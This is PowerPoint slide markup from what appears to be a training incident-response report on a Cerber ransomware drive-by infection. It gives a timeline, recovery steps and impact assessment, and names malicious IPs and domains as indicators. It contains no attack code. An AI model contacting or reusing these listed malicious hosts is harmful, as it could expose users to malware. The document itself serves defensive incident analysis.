            </a:rPr>
            <a:t>Review and Improv</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1800" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>e</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1842462" y="3350973"/>
        <a:ext cx="1226751" cy="6132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944B7-F8B7-4900-8BBD-942FA19DF801}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2227592" y="0"/>
          <a:ext cx="2634026" cy="263442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D8C68E-E856-4971-A6C9-58836C912B64}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2809798" y="951108"/>
          <a:ext cx="1463678" cy="73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a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>4. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Recover</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" kern="1200"/>
            <a:t>y</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2809798" y="951108"/>
        <a:ext cx="1463678" cy="731663"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{58DCE2BB-E7BA-4467-A876-E02B12BAA70E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1496000" y="1513674"/>
          <a:ext cx="2634026" cy="263442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223A5C-B074-4AB7-8101-B679B264A52B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2081175" y="2473538"/>
          <a:ext cx="1463678" cy="73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a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>5. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Impact</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2081175" y="2473538"/>
        <a:ext cx="1463678" cy="731663"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5FEBBA16-0F92-4262-8D57-E2AF56F832AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2415065" y="3208485"/>
          <a:ext cx="2263037" cy="2263944"/>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5AB9BA-1325-4B23-876C-6488374DCAE7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="2813261" y="3998157"/>
          <a:ext cx="1463678" cy="731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a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>6. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" b="1" kern="1200">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:rPr>
            <a:t>Root Cause Analysis</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2813261" y="3998157"/>
        <a:ext cx="1463678" cy="731663"/>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2">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3">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www.homeimprovement.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image" Target="../media/image6.png"/><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2" name="TextBox 12"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2579485" y="3196932"/>
            <a:ext cx="13129030" cy="3093727"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="25295"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1807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rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1807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YBER SECURITY</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Freeform 14"/>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4703564" y="5917914"/>
            <a:ext cx="8880872" cy="372745"/>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DEPI_1_MNF1_ISS7_M1e Cyber Security Incident Response Analyst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558637" y="9258300"/>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2" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17725552" y="9448548"/>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05</a:t>
            </a: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3821288" y="1677854"/>
            <a:ext cx="2133829" cy="1833759"/>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7" name="TextBox 17"/>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18" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2106133" y="4464956"/>
            <a:ext cx="2133829" cy="1833759"/>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0" name="TextBox 20"/>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21" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1575367" y="1878298"/>
            <a:ext cx="4910514" cy="4219973"/>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r="-28986"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="23" name="Group 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7746875" y="3988285"/>
            <a:ext cx="2133829" cy="1833759"/>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5" name="TextBox 25"/>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26" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6031720" y="6775387"/>
            <a:ext cx="2133829" cy="1833759"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="698500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Freeform 2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8" name="TextBox 28"/>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29" name="Group 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5703895" y="4188729"/>
            <a:ext cx="4910514" cy="4219973"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="698500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Freeform 3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7"/>
              <a:stretch>
                <a:fillRect l="-3321" r="-102516"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5955116" y="865119"/>
            <a:ext cx="5413455"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TIMELINE OF EVENTS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pP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32" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7098634" y="1730941"/>
            <a:ext cx="11443358" cy="1896543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2635"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1880">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>January 27, 2017:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2495"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1780">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>- 22:54:43– The first Snort NIDS alert was triggered, detecting suspicious HTTPtraffic originating from the user's machine(source IP 172.16.4.193) to a known malicious IP 194.87.234.129 on port 80.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2495"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1780">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>- 22:54:45– The user'ssystem sent an HTTP requestto ty.benme.com, which initiated the download of malicious content,specifically a compressed gzip file. This file was later identified as part of the Cerber ransomware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6187020" y="1997010"/>
            <a:ext cx="597723" cy="597723"/>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36" name="TextBox 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6315532" y="2187330"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10744062" y="7206897"/>
            <a:ext cx="7543938" cy="1842135"/>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Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>• 22:55:00 A series of additional HTTP requests were madeto other malicious websites, including p27dokhpz2n7nvgr.1jw2lx.top and spotsbill.com, indicating that the user had been fully redirected into a malicious infection chain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10016686" y="7758662"/>
            <a:ext cx="597723" cy="597723"/>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40" name="TextBox 4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41" name="TextBox 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10145199" y="794898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12" name="TextBox 1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3" name="TextBox 1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4" name="TextBox 1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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 1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6" name="TextBox 16"/>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06</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Freeform 17"/>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9" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8354486" y="2091882"/>
            <a:ext cx="7101947" cy="6103235"/>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19852" r="-9134"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="21" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13653565" y="3594161"/>
            <a:ext cx="3605735" cy="3098679"/>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3" name="TextBox 23"/>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24" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13904416" y="3809736"/>
            <a:ext cx="3104032" cy="2667527"/>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7"/>
              <a:stretch>
                <a:fillRect l="-18750" r="-18750"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2231883" y="1292198"/>
            <a:ext cx="4198277" cy="1861240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7200"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6485">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RECOVERY</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7200"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="6485">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27" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1319667" y="3115337"/>
            <a:ext cx="6776716" cy="3990340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>• Restoration of Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>• -All systems that were found to have connected to the maliciousURLs were taken offline and re-imaged to ensure complete removal of the malware.This was deemed necessary as even thoroughmalware removal mightleave remnants or backdoors, which could be exploited later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>• -Network traffic logs and pcap files were meticulously reviewedto confirm that the malware had not spreadfurther within the network and that no additional systems were compromised.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="395840" y="3501938"/>
            <a:ext cx="761264" cy="596544"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1037234" cy="812800"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Freeform 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1037234" cy="812800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1037234" h="812800">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1037234" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1037234"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30" name="TextBox 30"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-38100"/>
              <a:ext cx="1037234" cy="850900"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2660"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="559515" y="3691845"/>
            <a:ext cx="433915" cy="197828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1675"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1702387" y="7868219"/>
            <a:ext cx="13212907" cy="2323465"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>• Data Recovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>• -Fortunately, no data exfiltration occurred during this incident, as the primary goal of the attackerwas to encrypt files using ransomware, ratherthan steal data. As a result, data recovery efforts were minimal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>• -Even though no data was compromised, verifiedbackups of criticalsystems were reviewed and tested as part of standard recoveryprocedures, ensuring that the organization was prepared for worst-case scenarios in the future.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1900">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Group 33"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="611811" y="8272357"/>
            <a:ext cx="597723" cy="597723"/>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36" name="TextBox 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="740324" y="8462678"/>
            <a:ext cx="340698" cy="19818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07</a:t>
            </a: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670617" y="1076325"/>
            <a:ext cx="4947724"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IMPACT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pP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6" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166914" y="1917700"/>
            <a:ext cx="18121086" cy="2585085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Financial Impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>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The financial losseswere relatively minimaldue to the quick and efficient containment of the incident.The only losses incurredwere the costsassociated with downtime from re-imaging systems, laborcosts for investigation and recovery, andminor productivity losseswhile affected systems were offline.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>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7" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="166914" y="4531360"/>
            <a:ext cx="18121086" cy="2231390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Data Breach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>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No sensitive data was exfiltrated during this incident. The attacker’s primary goal was to infect systems with Cerber ransomware, which encrypts files and demands a ransom for decryption. Fortunately, the infection was identified early enough to prevent the ransomware from fully executing its payload.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6822440"/>
            <a:ext cx="18288000" cy="2956560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Reputation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>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Although the incident was containedbefore any significant damage could occur, there was a slightreputational impact on the company. Users who                  visited the  legitimate website, homeimprovement.com, and were redirected to malicious sites may have been exposedto the drive-by download attack.The company received severalinquiries from concerned users, requiring communication from the public relations team to reassure customers and mitigate the situation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>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08</a:t>
            </a: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4973997" y="1076325"/>
            <a:ext cx="6671304" cy="1855470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
